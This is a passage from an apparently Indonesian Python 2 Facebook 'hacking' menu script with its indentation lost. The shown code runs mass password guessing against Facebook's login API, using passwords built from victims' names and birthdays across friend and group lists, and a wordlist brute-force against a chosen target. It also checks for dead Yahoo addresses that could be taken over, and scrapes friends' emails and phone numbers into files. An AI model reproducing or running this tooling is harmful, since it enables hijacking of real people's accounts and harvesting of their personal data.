print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3
else:
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4
else:
pass5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass5
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass5
else:
pass6 = ('sayangku')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass6
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass6
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mAre you sure want to make wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mnot found'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
